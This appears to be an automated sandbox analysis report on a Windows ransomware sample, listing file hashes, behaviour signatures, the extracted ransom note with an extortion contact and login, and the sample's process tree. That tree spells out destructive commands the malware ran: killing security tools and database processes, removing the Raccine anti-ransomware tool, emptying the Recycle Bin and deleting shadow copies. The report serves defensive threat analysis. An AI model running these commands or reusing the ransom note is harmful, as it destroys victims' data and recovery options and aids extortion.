Analysis

  • max time kernel
    151s
  • max time network
    124s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    29-10-2021 12:15

General

  • Target

    fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120.exe

  • Size

    109KB

  • MD5

    2bd337b8648c7a465a1f94ba4a99c344

  • SHA1

    509cb9c71d34ec78c7fa937506758ae9ad0ebdd6

  • SHA256

    fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120

  • SHA512

    d31b87213494f9173d288a971704b384a582a3dd3fd3a7a4dec8f01aef9db3e8e08213fdb8b308db0a1320dbd4b8bcf553b4fbbe3d9a180b8faab432932dc667

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note
Hello !!! Many of your documents, photos, passwords, databases and other files are no longer available as they were encrypted. You may be looking for a way to recover your files, but don't waste your time. No one will be able to recover your files without our decryption KEY (if someone says they can do it, theywill also contact me and I will make the price much more expensive than if you contacted directly).                                   DONT USE GMAIL.COM TO CONTACT US               !!!THE DATARECOVERY COMPANIES JUST WANT YOUR MONEY!!!         !!DATA RECOVERY COMPANIES WILL ONLY INCREASE THE DECRYPTION TIME!! Can i Recover My Files?Sure. We guarantee that you can recover all your files safely and easily But You have not so enough time .As fast you pay as fastall of your data will be back as before encryption. Send e-mail to this address: [email protected] Or contact https://supportdatarecovery.cc/users.php user:Wanqu password:zVIJmqEB You have to pay for decryption in Bitcoins.                                                      ATTENTION !!! Do not rename encrypted files.Do not try to decrypt your data using third party software, it may cause permanent data loss.Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. We also have all your information to share .It is in your best interest to contact us as soon as possible. Key Identifier: JCtOvbNKClHRinQPBqfybeUkenhrvtaAgO28ngiGE5wH5iMQQr0oqa8gJA4GakZwOjfNiZyeZOWoIAqvNxaL/YrAa3cDofhLXhYr43sEWQ6P+uNAhV3KmnYxqjo+/To7F/g0K5/4Qp7qN2cOrQqSJzZy2B+Dua6Q96QWupndOK3nlyTgMLKc3YkTzCwTixQV70lbQuaBzGIAd2BFQXT1u2G16Nz26QKoQ/msyrgaFkKb8OxxTZqlUxJYp3tZEOutarrCssTqXunDMNb+yppLR9jIxWXvaXAhPv0xC8TE2rAIrV4EmP0ignq7f6nrpdm7JCGAJ9su7FcFoGE/dfCfjbz/sB/P43/tGbFaxiMFquaMhJrsKhb/+pX87AukuY9oZKSDvMoQ3iTO+7CrldJlMsmabtzUAxQXoGZ+3ZAgn9GCybVNOjfR58rubu6oqtNJKXxgyrbTZ3TuQmII/eYXOyihfM/+ZsQoF2FxiXR7bvO2fQ+PDyCyTre2af/t68XE2rek1SuWnpn/rX2zVD5WKwhguwI8ajpRiTQCWDWamxRiowDlHoxz1J/SBPksWmflqiVGb9A8cfsc1qZS7Pe5tb26YnFuVFjgmjEuO0JQC9eRE9bG7CyeAf+tjV4MtEDSPcWOh1pAl5X/nMR5BjxfzsU0tX9iOBwrLRpfxI92VYY=
URLs

https://supportdatarecovery.cc/users.php

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Ransom Note
Hello !!! Many of your documents, photos, passwords, databases and other files are no longer available as they were encrypted. You may be looking for a way to recover your files, but don't waste your time. No one will be able to recover your files without our decryption KEY (if someone says they can do it, theywill also contact me and I will make the price much more expensive than if you contacted directly). DONT USE GMAIL.COM TO CONTACT US !!!THE DATARECOVERY COMPANIES JUST WANT YOUR MONEY!!! !!DATA RECOVERY COMPANIES WILL ONLY INCREASE THE DECRYPTION TIME!! Can i Recover My Files?Sure. We guarantee that you can recover all your files safely and easily But You have not so enough time .As fast you pay as fastall of your data will be back as before encryption. Send e-mail to this address: [email protected] Or contact https://supportdatarecovery.cc/users.php user:Wanqu password:zVIJmqEB You have to pay for decryption in Bitcoins. ATTENTION !!! Do not rename encrypted files.Do not try to decrypt your data using third party software, it may cause permanent data loss.Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. We also have all your information to share .It is in your best interest to contact us as soon as possible. Key Identifier: JCtOvbNKClHRinQPBqfybeUkenhrvtaAgO28ngiGE5wH5iMQQr0oqa8gJA4GakZwOjfNiZyeZOWoIAqvNxaL/YrAa3cDofhLXhYr43sEWQ6P+uNAhV3KmnYxqjo+/To7F/g0K5/4Qp7qN2cOrQqSJzZy2B+Dua6Q96QWupndOK3nlyTgMLKc3YkTzCwTixQV70lbQuaBzGIAd2BFQXT1u2G16Nz26QKoQ/msyrgaFkKb8OxxTZqlUxJYp3tZEOutarrCssTqXunDMNb+yppLR9jIxWXvaXAhPv0xC8TE2rAIrV4EmP0ignq7f6nrpdm7JCGAJ9su7FcFoGE/dfCfjbz/sB/P43/tGbFaxiMFquaMhJrsKhb/+pX87AukuY9oZKSDvMoQ3iTO+7CrldJlMsmabtzUAxQXoGZ+3ZAgn9GCybVNOjfR58rubu6oqtNJKXxgyrbTZ3TuQmII/eYXOyihfM/+ZsQoF2FxiXR7bvO2fQ+PDyCyTre2af/t68XE2rek1SuWnpn/rX2zVD5WKwhguwI8ajpRiTQCWDWamxRiowDlHoxz1J/SBPksWmflqiVGb9A8cfsc1qZS7Pe5tb26YnFuVFjgmjEuO0JQC9eRE9bG7CyeAf+tjV4MtEDSPcWOh1pAl5X/nMR5BjxfzsU0tX9iOBwrLRpfxI92VYY=
URLs

https://supportdatarecovery.cc/users.php

Signatures

  • Disables Task Manager via registry modification
  • Modifies extensions of user files 22 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 1 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 32 IoCs
  • Drops file in Windows directory 23 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
  • Modifies registry class 20 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120.exe
    "C:\Users\Admin\AppData\Local\Temp\fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Drops desktop.ini file(s)
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3816
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1124
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:2692
      • C:\Windows\SysWOW64\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:440
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:3868
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
            PID:428
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLTELEMETRY start= disabled
            2⤵
              PID:2996
            • C:\Windows\SysWOW64\sc.exe
              "sc.exe" config FDResPub start= auto
              2⤵
                PID:1060
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                2⤵
                  PID:1464
                • C:\Windows\SysWOW64\sc.exe
                  "sc.exe" config SSDPSRV start= auto
                  2⤵
                    PID:612
                  • C:\Windows\SysWOW64\sc.exe
                    "sc.exe" config SstpSvc start= disabled
                    2⤵
                      PID:1032
                    • C:\Windows\SysWOW64\sc.exe
                      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                      2⤵
                        PID:720
                      • C:\Windows\SysWOW64\sc.exe
                        "sc.exe" config upnphost start= auto
                        2⤵
                          PID:372
                        • C:\Windows\SysWOW64\sc.exe
                          "sc.exe" config SQLWriter start= disabled
                          2⤵
                            PID:1172
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mspub.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2708
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mspub.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1240
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM synctime.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1644
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopqos.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3524
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM Ntrtscan.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2980
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mysqld.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3264
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopservice.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1320
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM isqlplussvc.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1504
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM sqbcoreservice.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3188
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM onenote.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3560
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM firefoxconfig.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3152
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM agntsvc.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4000
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM PccNTMon.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2328
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM excel.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1100
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM dbeng50.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1012
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM thebat.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1444
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM CNTAoSMgr.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2776
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM msaccess.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:760
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM steam.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1204
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM thebat64.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1508
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM sqlwriter.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:696
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM outlook.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2308
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM encsvc.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1372
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM ocomm.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1952
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM tbirdconfig.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1124
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM infopath.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1596
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM tmlisten.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3328
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" IM thunderbird.exe /F
                            2⤵
                            • Kills process with taskkill
                            PID:1460
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM wordpad.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2192
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM dbsnmp.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1004
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mbamtray.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2224
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM msftesql.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3632
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mysqld-opt.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1352
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM xfssvccon.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1640
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM zoolz.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1908
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM ocautoupds.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1440
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM powerpnt.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1180
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM ocssd.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1512
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopqos.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4000
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM oracle.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1644
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM visio.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1756
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM sqlagent.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1560
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopservice.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:712
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM sqlbrowser.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2300
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM winword.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:372
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM sqlservr.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2996
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mysqld-nt.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1704
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                            2⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2816
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                            2⤵
                              PID:400
                            • C:\Windows\splwow64.exe
                              C:\Windows\splwow64.exe 12288
                              2⤵
                                PID:1720

                            Network

                            MITRE ATT&CK Enterprise v6

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

                              MD5

                              52f031d4b3f5e869d2929a1c946786a4

                              SHA1

                              9a2a7aab2ef264be111ec030d4987e0e267005ff

                              SHA256

                              a53b2e1a94620aad80d65e61a9349ac5c547a2848087ba0a77f21c3c64081ca0

                              SHA512

                              db44f8b4c861de41a7cb615a3da39ac2e3a0aab078edd2b4b895ca66ab1a29cd1ea7458e46a464b89ee3cf20e534b240b89263310f65821bfd976bc9c7583161

                            • memory/372-176-0x0000000000000000-mapping.dmp

                            • memory/372-130-0x0000000000000000-mapping.dmp

                            • memory/400-206-0x0000000000000000-mapping.dmp

                            • memory/428-123-0x0000000000000000-mapping.dmp

                            • memory/440-121-0x0000000000000000-mapping.dmp

                            • memory/612-127-0x0000000000000000-mapping.dmp

                            • memory/696-152-0x0000000000000000-mapping.dmp

                            • memory/712-174-0x0000000000000000-mapping.dmp

                            • memory/720-128-0x0000000000000000-mapping.dmp

                            • memory/760-149-0x0000000000000000-mapping.dmp

                            • memory/1004-161-0x0000000000000000-mapping.dmp

                            • memory/1012-146-0x0000000000000000-mapping.dmp

                            • memory/1032-129-0x0000000000000000-mapping.dmp

                            • memory/1060-125-0x0000000000000000-mapping.dmp

                            • memory/1100-145-0x0000000000000000-mapping.dmp

                            • memory/1124-119-0x0000000000000000-mapping.dmp

                            • memory/1124-156-0x0000000000000000-mapping.dmp

                            • memory/1172-131-0x0000000000000000-mapping.dmp

                            • memory/1180-168-0x0000000000000000-mapping.dmp

                            • memory/1204-150-0x0000000000000000-mapping.dmp

                            • memory/1240-133-0x0000000000000000-mapping.dmp

                            • memory/1320-138-0x0000000000000000-mapping.dmp

                            • memory/1352-164-0x0000000000000000-mapping.dmp

                            • memory/1372-155-0x0000000000000000-mapping.dmp

                            • memory/1440-167-0x0000000000000000-mapping.dmp

                            • memory/1444-147-0x0000000000000000-mapping.dmp

                            • memory/1460-159-0x0000000000000000-mapping.dmp

                            • memory/1464-126-0x0000000000000000-mapping.dmp

                            • memory/1504-139-0x0000000000000000-mapping.dmp

                            • memory/1508-151-0x0000000000000000-mapping.dmp

                            • memory/1512-169-0x0000000000000000-mapping.dmp

                            • memory/1560-173-0x0000000000000000-mapping.dmp

                            • memory/1596-157-0x0000000000000000-mapping.dmp

                            • memory/1640-165-0x0000000000000000-mapping.dmp

                            • memory/1644-171-0x0000000000000000-mapping.dmp

                            • memory/1644-134-0x0000000000000000-mapping.dmp

                            • memory/1704-178-0x0000000000000000-mapping.dmp

                            • memory/1720-209-0x0000000000000000-mapping.dmp

                            • memory/1756-172-0x0000000000000000-mapping.dmp

                            • memory/1908-166-0x0000000000000000-mapping.dmp

                            • memory/1952-154-0x0000000000000000-mapping.dmp

                            • memory/2192-160-0x0000000000000000-mapping.dmp

                            • memory/2224-162-0x0000000000000000-mapping.dmp

                            • memory/2300-175-0x0000000000000000-mapping.dmp

                            • memory/2308-153-0x0000000000000000-mapping.dmp

                            • memory/2328-144-0x0000000000000000-mapping.dmp

                            • memory/2692-120-0x0000000000000000-mapping.dmp

                            • memory/2708-132-0x0000000000000000-mapping.dmp

                            • memory/2776-148-0x0000000000000000-mapping.dmp

                            • memory/2816-179-0x0000000000000000-mapping.dmp

                            • memory/2816-192-0x00000000084F0000-0x00000000084F1000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-205-0x0000000004A74000-0x0000000004A76000-memory.dmp

                              Filesize

                              8KB

                            • memory/2816-204-0x0000000004A73000-0x0000000004A74000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-203-0x0000000000FE0000-0x0000000000FE1000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-193-0x0000000000FE0000-0x0000000000FE1000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-191-0x0000000008720000-0x0000000008721000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-190-0x0000000007BD0000-0x0000000007BD1000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-189-0x0000000004A72000-0x0000000004A73000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-188-0x0000000004A70000-0x0000000004A71000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-187-0x0000000007E50000-0x0000000007E51000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-185-0x00000000074B0000-0x00000000074B1000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-184-0x0000000007410000-0x0000000007411000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-183-0x0000000007570000-0x0000000007571000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-180-0x0000000000FE0000-0x0000000000FE1000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-181-0x0000000000FE0000-0x0000000000FE1000-memory.dmp

                              Filesize

                              4KB

                            • memory/2816-182-0x00000000049A0000-0x00000000049A1000-memory.dmp

                              Filesize

                              4KB

                            • memory/2980-136-0x0000000000000000-mapping.dmp

                            • memory/2996-124-0x0000000000000000-mapping.dmp

                            • memory/2996-177-0x0000000000000000-mapping.dmp

                            • memory/3152-142-0x0000000000000000-mapping.dmp

                            • memory/3188-140-0x0000000000000000-mapping.dmp

                            • memory/3264-137-0x0000000000000000-mapping.dmp

                            • memory/3328-158-0x0000000000000000-mapping.dmp

                            • memory/3524-135-0x0000000000000000-mapping.dmp

                            • memory/3560-141-0x0000000000000000-mapping.dmp

                            • memory/3632-163-0x0000000000000000-mapping.dmp

                            • memory/3816-115-0x0000000000A90000-0x0000000000A91000-memory.dmp

                              Filesize

                              4KB

                            • memory/3816-207-0x00000000083E0000-0x00000000083E1000-memory.dmp

                              Filesize

                              4KB

                            • memory/3816-208-0x0000000008B20000-0x0000000008B21000-memory.dmp

                              Filesize

                              4KB

                            • memory/3816-118-0x00000000052E0000-0x00000000052E1000-memory.dmp

                              Filesize

                              4KB

                            • memory/3816-117-0x0000000005370000-0x0000000005371000-memory.dmp

                              Filesize

                              4KB

                            • memory/3816-211-0x0000000006E10000-0x0000000006E11000-memory.dmp

                              Filesize

                              4KB

                            • memory/3868-122-0x0000000000000000-mapping.dmp

                            • memory/4000-143-0x0000000000000000-mapping.dmp

                            • memory/4000-170-0x0000000000000000-mapping.dmp